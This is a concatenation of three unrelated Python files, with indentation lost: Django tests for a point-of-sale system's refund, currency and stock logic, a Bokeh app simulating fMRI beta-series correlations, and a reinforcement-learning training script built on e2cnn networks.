Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl, rfl2])
def test_refund_line_too_many_old_new_refunded(self):
count = 5
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
trl = TransactionLine.objects.get()
count_refund = -2
count_refund2 = -2
count_refund_new = -2
rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
rfl2 = RefundTransactionLine(count=count_refund2, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * (count_refund + count_refund2),
currency=Currency(USED_CURRENCY))
nega_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl, rfl2])
rfl3 = RefundTransactionLine(count=count_refund_new, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund_new,
currency=Currency(USED_CURRENCY))
last_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(RefundError):
Transaction.create_transaction(user=self.copro, payments=[last_payment], transaction_lines=[rfl3])
class TestSalesFeaturesWithMixin(TestCase, TestData):
def setUp(self):
self.setup_base_data()
def test_other_cost(self):
oth_count = 8
order = self.create_custorders(othercost_1=oth_count)
self.create_suporders()
self.create_packingdocuments()
self.register_3.open(Decimal(0))
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=oth_count,
other_cost_type=self.othercosttype_1, order=order.id)
money_3 = Money(amount=self.price_system_currency_1.amount * oth_count,
currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
other_cost_type=self.othercosttype_1, order=order.id)
money_3 = Money(amount=self.price_system_currency_1.amount * 1, currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
with self.assertRaises(NotEnoughOrderLinesError):
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
def test_refund_stock_amount(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments(article_1=3)
self.create_transactions_article_type_for_order(article_1=2, order=order.id)
stl = SalesTransactionLine.objects.get(article=self.articletype_1)
rfl_1 = RefundTransactionLine(price=self.price_system_currency_1, count=-1, sold_transaction_line=stl)
money_1 = Money(amount=self.price_system_currency_1.amount * -1, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_maestro)
st_level = Stock.objects.get(article=self.articletype_1)
self.assertEqual(st_level.count, 1)
Transaction.create_transaction(user=self.user_2, payments=[pymnt_1], transaction_lines=[rfl_1],
customer=self.customer_person_2)
st_level = Stock.objects.get(article=self.articletype_1, labeltype__isnull=True)
self.assertEqual(st_level.count, 1)
def test_no_matching_currency(self):
rupee = CurrencyData(iso="INR", name="Indian Rupee", digits=2, symbol="₹")
rupee.save()
new_register = Register(name="<NAME>", currency=rupee, payment_type=self.paymenttype_maestro)
new_register.save()
new_register.open(Decimal(0))
self.create_custorders()
oth_count = 2
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=oth_count,
other_cost_type=self.othercosttype_1, order=1)
money_3 = Money(amount=self.price_system_currency_1.amount * oth_count,
currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
with self.assertRaises(PaymentTypeError):
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
def test_mixing_payment_currency(self):
rupee = CurrencyData(iso="INR", name="Indian Rupee", digits=2, symbol="₹")
rupee.save()
new_register = Register(name="<NAME>", currency=rupee, payment_type=self.paymenttype_maestro)
new_register.save()
new_register.open(Decimal(0))
# Fake transaction with indian rupees, this cannot be done without changing the USED_CURRENCY
# string which is not possible in this test environment
transaction = Transaction(salesperiod=RegisterMaster.get_open_sales_period(), customer=None,
user_modified=self.user_1)
super(Transaction, transaction).save()
price = Price(amount=Decimal(1), currency=Currency("INR"), vat=Decimal("1"))
money = Money(amount=Decimal(1), currency=Currency("INR"))
transaction_line = OtherCostTransactionLine(other_cost_type=self.othercosttype_1, transaction=transaction,
num=self.othercosttype_1.pk, text="Foo", order=None,
accounting_group=self.accounting_group_components, price=price,
user_modified=self.user_1, count=1)
super(TransactionLine, transaction_line).save()
payment = Payment(transaction=transaction, amount=money, payment_type=self.paymenttype_maestro)
super(Payment, payment).save()
self.register_3.open(Decimal(0))
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
other_cost_type=self.othercosttype_1, order=None)
money_3 = Money(amount=self.price_system_currency_1.amount * 1,
currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
with self.assertRaises(PaymentTypeError):
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
def test_original_pricing_price_override(self):
self.create_externalisation()
self.register_3.open(Decimal(0))
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
other_cost_type=self.othercosttype_1, order=None,
original_price=PriceOverride(original_price=self.price_systen_currency_2, user=self.user_1, reason="Banaan"))
money_3 = Money(amount=self.price_system_currency_1.amount * 1,
currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
octl = OtherCostTransactionLine.objects.get()
original_price = PriceOverride.objects.get()
self.assertEqual(octl.original_price, original_price)
def test_no_price_override_returns_null(self):
self.create_externalisation()
self.register_3.open(Decimal(0))
octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
other_cost_type=self.othercosttype_1, order=None)
money_3 = Money(amount=self.price_system_currency_1.amount * 1,
currency=self.price_system_currency_1.currency)
pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
customer=self.customer_person_2)
octl = OtherCostTransactionLine.objects.get()
self.assertIsNone(octl.original_price)
class StockTests(TestCase, TestData):
def setUp(self):
self.setup_base_data()
self.articletype_1.fixed_price = self.price_system_currency_1
self.articletype_1.save()
self.articletype_2.fixed_price = self.price_systen_currency_2
self.articletype_2.save()
def test_get_stock_for_customer(self):
changeset = [{
'article': self.articletype_1,
'book_value': self.cost_system_currency_1,
'count': 3,
'is_in': True,
'label': OrderLabel(1)
},
{
'article': self.articletype_1,
'book_value': self.cost_system_currency_1,
'count': 5,
'is_in': True,
},
{
'article': self.articletype_2,
'book_value': self.cost_system_currency_2,
'count': 6,
'is_in': True,
},
{
'article': self.articletype_2,
'book_value': self.cost_system_currency_2,
'count': 7,
'is_in': True,
'label': OrderLabel(2)
}
]
StockChangeSet.construct(description="Bla", entries=changeset, source=StockChangeSet.SOURCE_TEST_DO_NOT_USE)
result = StockCollections.get_stock_with_prices(self.customer_person_1)
self.assertEqual(len(result), 2)
for line in result:
if line[0].article == self.articletype_1:
self.assertEqual(line[0].count, 5)
self.assertEqual(line[1].amount, self.price_system_currency_1.amount)
else:
self.assertEqual(line[0].count, 6)
self.assertEqual(line[1].amount, self.price_systen_currency_2.amount)
def test_get_order_stock_for_customers(self):
self.create_custorders()
self.create_suporders()
PACK_ART_1 = 3
PACK_ART_2 = 4
self.create_packingdocuments(article_1=PACK_ART_1, article_2=PACK_ART_2)
result = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_1)
correct_price = {self.articletype_1: self.price_system_currency_1,
self.articletype_2: self.price_systen_currency_2}
correct_amount = {self.articletype_1: PACK_ART_1,
self.articletype_2: PACK_ART_2}
for line in result:
self.assertEqual(line[1], correct_price.get(line[0].article))
self.assertEqual(line[0].count, correct_amount.get(line[0].article))
def test_get_mixed_orders_only_get_correct_ones(self):
self.create_custorders(article_1=5,article_2=7, customer=self.customer_person_1)
self.create_custorders(article_1=2, article_2=3, customer=self.customer_person_2)
self.create_suporders(article_1=7, article_2=10)
self.create_packingdocuments(article_1=7, article_2=10)
result = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_1)
for line in result:
self.assertTrue(line[0].count in [5, 7])
result2 = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_2)
for line in result2:
self.assertTrue(line[0].count in [2, 3])
def test_get_only_stock_mixed(self):
self.create_custorders(article_1=5, article_2=7, customer=self.customer_person_1)
self.create_stockwish(article_1=1, article_2=0)
self.create_suporders(article_1=6, article_2=7)
self.create_packingdocuments(article_1=6, article_2=7)
result = StockCollections.get_stock_with_prices(customer=self.customer_person_1)
self.assertEqual(len(result), 1)
self.assertEqual(result[0][0].count, 1)
self.assertEqual(result[0][0].article, self.articletype_1)
|
''' Present an interactive function explorer with slider widgets.
Scrub the sliders to change the properties of the ``hrf`` curve, or
type into the title text box to update the title of the plot.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve sliders.py
at your command prompt. Then navigate to the URL
http://localhost:5006/sliders
in your browser.
'''
import numpy as np
from nistats import hemodynamic_models
from statsmodels.tsa.arima_process import ArmaProcess
import pandas as pd
from scipy.optimize import minimize
from bokeh.layouts import grid
from bokeh.core.properties import value
from bokeh.palettes import Dark2
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.models import ColumnDataSource, Label, Div, Toggle, LabelSet
from bokeh.models.widgets import Slider
from bokeh.plotting import figure
from bokeh.models.glyphs import Segment
def generate_2voxels_signal(tr=1, corr=0, n_trials=15,
initial_guess=None,
design_resolution=0.1,
onset_offset=0,
timepoints=200):
np.random.seed(12345)
corr_mat = np.array([[1, corr], [corr, 1]])
trial_interval = int(timepoints / n_trials)
onsets = np.array(range(onset_offset, timepoints-10, trial_interval))
# want the mean betas of each voxel to be one
gnd_means = np.ones(2)
# continue while loop while the target correlations
# are more than 0.1 off
c_wrong = True
c_tol = 0.1
while c_wrong:
# generate betas
if initial_guess is None:
initial_guess = np.random.multivariate_normal(
gnd_means,
corr_mat,
size=(onsets.shape[0]),
tol=0.00005
)
sim_betas = minimize(
_check_data,
initial_guess,
args=(corr_mat,),
method='BFGS',
tol=1e-10
).x
# reshape the output (comes out 1-dimensional)
sim_betas = sim_betas.reshape(initial_guess.shape)
corr_error = _check_data(
sim_betas,
corr_mat,
)
c_wrong = c_tol < corr_error
initial_guess = None
mean_fix = 1 - sim_betas.mean(axis=0)
# ensure each beta series has average of 1.
betas = sim_betas + mean_fix
onsets_res = (onsets // design_resolution).astype(int)
duration_res = int(timepoints / design_resolution)
stim_duration_res = int(0.5 / design_resolution)
sampling_rate = int(tr / design_resolution)
X = np.zeros((duration_res, onsets.shape[0]))
for idx, onset in enumerate(onsets_res):
# set the design matrix
X[onset:onset+stim_duration_res, idx] = 1
X[:, idx] = np.convolve(
X[:, idx], hemodynamic_models._gamma_difference_hrf(
tr, oversampling=sampling_rate))[0:X.shape[0]]
# downsample X so it's back to TR resolution
X = X[::sampling_rate, :]
region1 = np.squeeze(X @ betas[:, 0])
region2 = np.squeeze(X @ betas[:, 1])
return onsets, betas, region1, region2
def generate_noise(timepoints=200, scale=0.01):
np.random.seed(12345)
# make the noise component
rho = 0.12
ar = np.array([1, -rho]) # statmodels says to invert rho
ap = ArmaProcess(ar)
err = ap.generate_sample(timepoints, scale=scale, axis=0)
return err
def add_components(conditions, noise=None):
if noise:
conditions.append(noise)
Y = np.sum(conditions, axis=0)
return Y
def _check_data(x, target_corr_mat):
corr_mat_obs = np.corrcoef(x.T)
corr_error = _check_corr(corr_mat_obs, target_corr_mat)
return corr_error
def _check_corr(corr_mat_obs, corr_mat_gnd):
return np.sum(np.abs(corr_mat_obs - corr_mat_gnd)) / 2
# Set up data
corr_a = 0.0
corr_b = 0.8
timepoints = 200
# values for condition A
onsets_a, betas_a, region_1a, region_2a = generate_2voxels_signal(
corr=corr_a, timepoints=timepoints)
# values for condition B
onsets_b, betas_b, region_1b, region_2b = generate_2voxels_signal(
corr=corr_b, timepoints=timepoints, onset_offset=4)
# full signal
Y_region_1 = add_components([region_1a, region_1b])
Y_region_2 = add_components([region_2a, region_2b])
df_r1 = pd.DataFrame.from_dict({"Y": Y_region_1,
"A": region_1a,
"B": region_1b})
df_r2 = pd.DataFrame.from_dict({"Y": Y_region_2,
"A": region_2a,
"B": region_2b})
source_r1 = ColumnDataSource(df_r1)
source_r2 = ColumnDataSource(df_r2)
# label_source
betas_a_rnd = np.round(betas_a, 2)
betas_b_rnd = np.round(betas_b, 2)
df_ls_a = pd.DataFrame.from_dict({"onsets": onsets_a,
"betas_r1": betas_a_rnd[:, 0],
"betas_r2": betas_a_rnd[:, 1]})
df_ls_b = pd.DataFrame.from_dict({"onsets": onsets_b,
"betas_r1": betas_b_rnd[:, 0],
"betas_r2": betas_b_rnd[:, 1]})
source_la = ColumnDataSource(df_ls_a)
source_lb = ColumnDataSource(df_ls_b)
# Set up plots for time series
plot_r1 = figure(plot_height=200, plot_width=800, title="Region 1",
tools="crosshair,reset,save,wheel_zoom",
x_range=[0, timepoints], y_range=[-.2, 0.8])
plot_r2 = figure(plot_height=200, plot_width=800, title="Region 2",
tools="crosshair,reset,save,wheel_zoom",
x_range=[0, timepoints], y_range=[-0.2, 0.8])
plot_r1.xaxis.visible = plot_r2.xaxis.visible = False
plot_r1.xaxis.axis_label = plot_r2.xaxis.axis_label = "Volumes"
for plot, source in zip([plot_r1, plot_r2], [source_r1, source_r2]):
for name, color in zip(df_r1.columns, Dark2[3]):
if "Y" in name:
line_width = 4
line_alpha = 0.6
else:
line_width = 2
line_alpha = 1.
plot.line(x='index',
y=name,
line_width=line_width,
line_alpha=line_alpha,
source=source,
color=color,
legend=value(name))
plot.legend.location = "top_left"
plot.legend.orientation = "horizontal"
plot.legend.click_policy = "hide"
trial_type_a_corr = Label(x=159, y=175, x_units='screen', y_units='screen',
text='Trial Type A Correlation: {corr}'.format(corr=corr_a),
render_mode='css', border_line_color='black', border_line_alpha=1.0,
background_fill_color='white', background_fill_alpha=1.0)
trial_type_b_corr = Label(x=385, y=175, x_units='screen', y_units='screen',
text='Trial Type B Correlation: {corr}'.format(corr=corr_b),
render_mode='css', border_line_color='black', border_line_alpha=1.0,
background_fill_color='white', background_fill_alpha=1.0)
plot_r2.add_layout(trial_type_a_corr)
plot_r2.add_layout(trial_type_b_corr)
# Set up widgets
data_title = Div(text="<b>Correlation Settings</b>",
style={'font-size': '100%'}, width=200, height=30)
corr_a_widget = Slider(title="Trial Type A Correlation", value=corr_a, start=-1, end=1, step=0.1)
corr_b_widget = Slider(title="Trial Type B Correlation", value=corr_b, start=-1, end=1, step=0.1)
noise_widget = Slider(title="noise", value=0, start=0, end=0.1, step=0.01)
widgets = [data_title,
corr_a_widget,
corr_b_widget,
noise_widget]
beta_a_toggle = Toggle(label="Show A Betas", button_type="success", active=True)
beta_b_toggle = Toggle(label="Show B Betas", button_type="success", active=True)
for y0, y1, plot, beta_key, in zip([-0.2, 0.04],
[0, 0.08],
[plot_r1, plot_r2],
['betas_r1', 'betas_r2']):
for idx, (onsets, betas, toggle, source) in enumerate(zip([onsets_a, onsets_b],
[betas_a, betas_b],
[beta_a_toggle, beta_b_toggle],
[source_la, source_lb])):
y0s = y0 * len(onsets)
y1s = y1 * len(onsets)
lbls = LabelSet(x='onsets', y=0.35,
text=beta_key, source=source,
text_color=Dark2[3][idx+1])
plot.add_layout(lbls)
toggle.js_link('active', lbls, 'visible')
plot.segment(x0=onsets, x1=onsets, y0=y0s, y1=y1s,
color=Dark2[3][idx+1], line_width=4)
# set up plots for correlations
plot_a = figure(plot_height=400, plot_width=400, title="Beta Series Correlation: A",
tools="crosshair,reset,hover,save,wheel_zoom")
plot_b = figure(plot_height=400, plot_width=400, title="Beta Series Correlation: B",
tools="crosshair,reset,hover,save,wheel_zoom")
plot_a.scatter(x='betas_r1', y='betas_r2', fill_color=Dark2[3][1],
source=source_la, line_color=None, size=15)
plot_b.scatter(x='betas_r1', y='betas_r2', fill_color=Dark2[3][2],
source=source_lb, line_color=None, size=15)
plot_a.yaxis.axis_label = "Region 2"
plot_a.xaxis.axis_label = "Region 1"
plot_b.yaxis.axis_label = "Region 2"
plot_b.xaxis.axis_label = "Region 1"
def update(attrname, old, new):
# values for condition A
_, betas_a, region_1a, region_2a = generate_2voxels_signal(
corr=corr_a_widget.value, timepoints=timepoints)
# values for condition B
_, betas_b, region_1b, region_2b = generate_2voxels_signal(
corr=corr_b_widget.value, timepoints=timepoints, onset_offset=4)
# full signal
region_1_list = [region_1a, region_1b]
region_2_list = [region_2a, region_2b]
if noise_widget.value > 0:
region_1_noise = generate_noise(timepoints=timepoints, scale=noise_widget.value)
region_2_noise = generate_noise(timepoints=timepoints, scale=noise_widget.value)
region_1_list.append(region_1_noise)
region_2_list.append(region_2_noise)
Y_region_1 = add_components(region_1_list)
Y_region_2 = add_components(region_2_list)
betas_a_rnd = np.round(betas_a, 2)
betas_b_rnd = np.round(betas_b, 2)
s = slice(0, len(source_r1.data['Y']))
source_r1.patch({"Y": [(s, Y_region_1)],
"A": [(s, region_1a)],
"B": [(s, region_1b)]
})
source_r2.patch({"Y": [(s, Y_region_2)],
"A": [(s, region_2a)],
"B": [(s, region_2b)]
})
s2 = slice(0, len(source_la.data['onsets']))
source_la.patch({"betas_r1": [(s2, betas_a_rnd[:, 0])],
"betas_r2": [(s2, betas_a_rnd[:, 1])]
})
s3 = slice(0, len(source_lb.data['onsets']))
source_lb.patch({"betas_r1": [(s3, betas_b_rnd[:, 0])],
"betas_r2": [(s3, betas_b_rnd[:, 1])]
})
trial_type_a_corr.text = 'Trial Type A Correlation: {corr}'.format(corr=corr_a_widget.value)
trial_type_b_corr.text = 'Trial Type B Correlation: {corr}'.format(corr=corr_b_widget.value)
for w in widgets[1:]:
w.on_change('value', update)
data_inputs = column(widgets)
curdoc().add_root(grid([[plot_r1], [plot_r2, [beta_a_toggle, beta_b_toggle]], [plot_a, plot_b], [data_inputs]]))
curdoc().title = "My Awesome Task"
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import utils
from logger import Logger
from replay_buffer import ReplayBufferStorage, make_replay_loader
from video import TrainVideoRecorder, VideoRecorder
from collections import OrderedDict
import dmc
import warnings
from copy import deepcopy
from pathlib import Path
import hydra
import numpy as np
import torch
from torch import nn
import e2cnn.nn as enn
from e2cnn import gspaces
from dm_env import specs
import os
os.environ['MUJOCO_GL'] = 'egl'
warnings.filterwarnings('ignore', category=DeprecationWarning)
os.environ['MKL_SERVICE_FORCE_INTEL'] = '1'
torch.backends.cudnn.benchmark = True
# group action acting on all networks
g = gspaces.Flip2dOnR2()
def enc_net(obs_shape, act, load_weights):
n_out = 128
chan_up = n_out // 6
net = nn.Sequential(
# 84x84
enn.R2Conv(enn.FieldType(act, obs_shape[0] * [act.trivial_repr]),
enn.FieldType(act, chan_up*1 *
[act.regular_repr]),
kernel_size=3, padding=1),
enn.ReLU(enn.FieldType(act, chan_up*1 *
[act.regular_repr]), inplace=True),
enn.PointwiseMaxPool(enn.FieldType(
act, chan_up*1 * [act.regular_repr]), 2),
# 42x42
enn.R2Conv(enn.FieldType(act, chan_up*1 * [act.regular_repr]),
enn.FieldType(act, chan_up*2 *
[act.regular_repr]),
kernel_size=3, padding=0),
enn.ReLU(enn.FieldType(act, chan_up*2 *
[act.regular_repr]), inplace=True),
enn.PointwiseMaxPool(enn.FieldType(
act, chan_up*2 * [act.regular_repr]), 2),
# 20x20
enn.R2Conv(enn.FieldType(act, chan_up*2 * [act.regular_repr]),
enn.FieldType(act, chan_up*3 *
[act.regular_repr]),
kernel_size=3, padding=1),
enn.ReLU(enn.FieldType(act, chan_up*3 *
[act.regular_repr]), inplace=True),
enn.PointwiseMaxPool(enn.FieldType(
act, chan_up*3 * [act.regular_repr]), 2),
# 10x10
enn.R2Conv(enn.FieldType(act, chan_up*3 * [act.regular_repr]),
enn.FieldType(act, chan_up*4 *
[act.regular_repr]),
kernel_size=3, padding=1),
enn.ReLU(enn.FieldType(act, chan_up*4 *
[act.regular_repr]), inplace=True),
enn.PointwiseMaxPool(enn.FieldType(
act, chan_up*4 * [act.regular_repr]), 2),
# 5x5
enn.R2Conv(enn.FieldType(act, chan_up*4 * [act.regular_repr]),
enn.FieldType(act, chan_up*5 *
[act.regular_repr]),
kernel_size=3, padding=0),
enn.ReLU(enn.FieldType(act, chan_up*5 *
[act.regular_repr]), inplace=True),
# 3x3
enn.R2Conv(enn.FieldType(act, chan_up*5 * [act.regular_repr]),
enn.FieldType(act, n_out *
[act.regular_repr]),
kernel_size=3, padding=0),
enn.ReLU(enn.FieldType(act, n_out *
[act.regular_repr]), inplace=True),
# 1x1
enn.R2Conv(enn.FieldType(act, n_out * [act.regular_repr]),
enn.FieldType(act, 1024 * \
[act.irrep(1)]),
kernel_size=1)
)
if load_weights:
dict_init = torch.load(os.path.join(Path.cwd(), 'encWeights.pt'))
net.load_state_dict(dict_init)
return net, 1024
def act_net(repr_dim, act, load_weights):
# hardcoded from cfg to test backing up to only equi encoder
feature_dim = 50
hidden_dim = 1024
net = nn.Sequential(nn.Linear(repr_dim, feature_dim),
nn.LayerNorm(feature_dim),
nn.Tanh(),
nn.Linear(feature_dim, hidden_dim),
nn.ReLU(inplace=True),
nn.Linear(hidden_dim, hidden_dim),
nn.ReLU(inplace=True),
nn.Linear(hidden_dim, 1))
if load_weights:
dict_init = torch.load(os.path.join(Path.cwd(), 'actWeights.pt'))
net.load_state_dict(dict_init)
return net
def crit_net(repr_dim, action_shape, act, load_weights, target):
hidden_dim = 1024
feature_dim = 50
net1 = nn.Sequential(
nn.Linear(feature_dim + action_shape[0], hidden_dim),
nn.ReLU(inplace=True), nn.Linear(hidden_dim, hidden_dim),
nn.ReLU(inplace=True), nn.Linear(hidden_dim, 1)
)
net2 = nn.Sequential(
nn.Linear(feature_dim + action_shape[0], hidden_dim),
nn.ReLU(inplace=True), nn.Linear(hidden_dim, hidden_dim),
nn.ReLU(inplace=True), nn.Linear(hidden_dim, 1)
)
trunk = nn.Sequential(
nn.Linear(repr_dim, feature_dim),
nn.LayerNorm(feature_dim), nn.Tanh()
)
if load_weights:
if target:
dict_init1 = torch.load(os.path.join(
Path.cwd(), 'critTargWeights1.pt'))
dict_init2 = torch.load(os.path.join(
Path.cwd(), 'critTargWeights2.pt'))
dict_init_trunk = torch.load(os.path.join(
Path.cwd(), 'critTargWeightsTrunk.pt'))
else:
dict_init1 = torch.load(os.path.join(
Path.cwd(), 'critWeights1.pt'))
dict_init2 = torch.load(os.path.join(
Path.cwd(), 'critWeights2.pt'))
dict_init_trunk = torch.load(
os.path.join(Path.cwd(), 'critWeightsTrunk.pt'))
net1.load_state_dict(dict_init1)
net2.load_state_dict(dict_init2)
trunk.load_state_dict(dict_init_trunk)
return net1, net2, trunk
def make_agent(obs_spec, action_spec, cfg):
global g
cfg.obs_shape = obs_spec.shape
cfg.action_shape = action_spec.shape
agent = hydra.utils.instantiate(cfg)
# don't load weights because we're not loading from pickle, instead initialize
enc, repr_dim = enc_net(cfg.obs_shape, g, load_weights=False)
act = act_net(repr_dim, g, load_weights=False)
q1, q2, trunk = crit_net(
repr_dim, cfg.action_shape, g, load_weights=False, target=False)
qt1, qt2, trunkT = crit_net(
repr_dim, cfg.action_shape, g, load_weights=False, target=True)
# set networks in agent
agent.set_networks(g, repr_dim, enc, act, q1, q2, qt1, qt2, trunk, trunkT)
agent.encoder.apply(utils.weight_init)
agent.actor.apply(utils.weight_init)
agent.critic.apply(utils.weight_init)
agent.critic_target.apply(utils.weight_init)
agent.encoder.to('cuda')
agent.actor.to('cuda')
agent.critic.to('cuda')
agent.critic_target.to('cuda')
agent.critic_target.load_state_dict(agent.critic.state_dict())
agent.encoder_opt = torch.optim.Adam(agent.encoder.parameters(), lr=cfg.lr)
agent.actor_opt = torch.optim.Adam(agent.actor.parameters(), lr=cfg.lr)
agent.critic_opt = torch.optim.Adam(agent.critic.parameters(), lr=cfg.lr)
agent.train()
agent.critic_target.train()
return agent
class Workspace:
def __init__(self, cfg):
self.work_dir = Path.cwd()
print(f'workspace: {self.work_dir}')
self.cfg = cfg
utils.set_seed_everywhere(cfg.seed)
self.device = torch.device(cfg.device)
self.setup()
self.agent = make_agent(self.train_env.observation_spec(),
self.train_env.action_spec(),
self.cfg.agent)
self.timer = utils.Timer()
self._global_step = 0
self._global_episode = 0
# files to save e2cnn network weights because they're unpicklable
self.enc_weight_dir = "encWeights.pt"
self.actor_weight_dir = "actWeights.pt"
self.critic_weight_dir1 = "critWeights1.pt"
self.critic_weight_dir2 = "critWeights2.pt"
self.criticT_weight_dir1 = "critTargWeights1.pt"
self.criticT_weight_dir2 = "critTargWeights2.pt"
self.critic_weight_dirTrunk = "critWeightsTrunk.pt"
self.critic_weight_dirTrunkT = "critTargWeightsTrunk.pt"
def setup(self):
# create logger
self.logger = Logger(self.work_dir, use_tb=self.cfg.use_tb)
# create envs
self.train_env = dmc.make(self.cfg.task_name, self.cfg.frame_stack,
self.cfg.action_repeat, self.cfg.seed)
self.eval_env = dmc.make(self.cfg.task_name, self.cfg.frame_stack,
self.cfg.action_repeat, self.cfg.seed)
# create replay buffer
data_specs = (self.train_env.observation_spec(),
self.train_env.action_spec(),
specs.Array((1,), np.float32, 'reward'),
specs.Array((1,), np.float32, 'discount'))
self.replay_storage = ReplayBufferStorage(data_specs,
self.work_dir / 'buffer')
self.replay_loader = make_replay_loader(
self.work_dir / 'buffer', self.cfg.replay_buffer_size,
self.cfg.batch_size, self.cfg.replay_buffer_num_workers,
self.cfg.save_snapshot, self.cfg.nstep, self.cfg.discount)
self._replay_iter = None
self.video_recorder = VideoRecorder(
self.work_dir if self.cfg.save_video else None)
self.train_video_recorder = TrainVideoRecorder(
self.work_dir if self.cfg.save_train_video else None)
@property
def global_step(self):
return self._global_step
@property
def global_episode(self):
return self._global_episode
@property
def global_frame(self):
return self.global_step * self.cfg.action_repeat
@property
def replay_iter(self):
if self._replay_iter is None:
self._replay_iter = iter(self.replay_loader)
return self._replay_iter
def eval(self):
step, episode, total_reward = 0, 0, 0
eval_until_episode = utils.Until(self.cfg.num_eval_episodes)
while eval_until_episode(episode):
time_step = self.eval_env.reset()
self.video_recorder.init(self.eval_env, enabled=(episode == 0))
while not time_step.last():
with torch.no_grad(), utils.eval_mode(self.agent):
action = self.agent.act(time_step.observation,
self.global_step,
eval_mode=True)
time_step = self.eval_env.step(action)
self.video_recorder.record(self.eval_env)
total_reward += time_step.reward
step += 1
episode += 1
self.video_recorder.save(f'{self.global_frame}.mp4')
with self.logger.log_and_dump_ctx(self.global_frame, ty='eval') as log:
log('episode_reward', total_reward / episode)
log('episode_length', step * self.cfg.action_repeat / episode)
log('episode', self.global_episode)
log('step', self.global_step)
def train(self):
# predicates
train_until_step = utils.Until(self.cfg.num_train_frames,
self.cfg.action_repeat)
seed_until_step = utils.Until(self.cfg.num_seed_frames,
self.cfg.action_repeat)
eval_every_step = utils.Every(self.cfg.eval_every_frames,
self.cfg.action_repeat)
episode_step, episode_reward = 0, 0
time_step = self.train_env.reset()
self.replay_storage.add(time_step)
self.train_video_recorder.init(time_step.observation)
metrics = None
while train_until_step(self.global_step):
if time_step.last():
self._global_episode += 1
if self.global_frame % 100000 == 0:
# save vid every 100k frames instead of every 10k
self.train_video_recorder.save(f'{self.global_frame}.mp4')
# wait until all the metrics schema is populated
if metrics is not None:
# log stats
elapsed_time, total_time = self.timer.reset()
episode_frame = episode_step * self.cfg.action_repeat
with self.logger.log_and_dump_ctx(self.global_frame,
ty='train') as log:
log('fps', episode_frame / elapsed_time)
log('total_time', total_time)
log('episode_reward', episode_reward)
log('episode_length', episode_frame)
log('episode', self.global_episode)
log('buffer_size', len(self.replay_storage))
log('step', self.global_step)
# reset env
time_step = self.train_env.reset()
self.replay_storage.add(time_step)
self.train_video_recorder.init(time_step.observation)
# try to save snapshot
if self.cfg.save_snapshot:
self.save_snapshot()
episode_step = 0
episode_reward = 0
# try to evaluate
if eval_every_step(self.global_step):
self.logger.log('eval_total_time', self.timer.total_time(),
self.global_frame)
self.eval()
# sample action
with torch.no_grad(), utils.eval_mode(self.agent):
action = self.agent.act(time_step.observation,
self.global_step,
eval_mode=False)
# try to update the agent
if not seed_until_step(self.global_step):
metrics = self.agent.update(self.replay_iter, self.global_step)
self.logger.log_metrics(metrics, self.global_frame, ty='train')
# take env step
time_step = self.train_env.step(action)
episode_reward += time_step.reward
self.replay_storage.add(time_step)
self.train_video_recorder.record(time_step.observation)
episode_step += 1
self._global_step += 1
def save_snapshot(self):
snapshot = self.work_dir / 'snapshot.pt'
keys_to_save = ['agent', 'timer', '_global_step', '_global_episode']
payload = {k: self.__dict__[k] for k in keys_to_save}
with snapshot.open('wb') as f:
torch.save(payload, f)
self.agent.save_enc(self.enc_weight_dir)
self.agent.save_actor(self.actor_weight_dir)
self.agent.save_critic(self.critic_weight_dir1, self.critic_weight_dir2,
self.criticT_weight_dir1, self.criticT_weight_dir2,
self.critic_weight_dirTrunk, self.critic_weight_dirTrunkT)
def load_snapshot(self):
global g
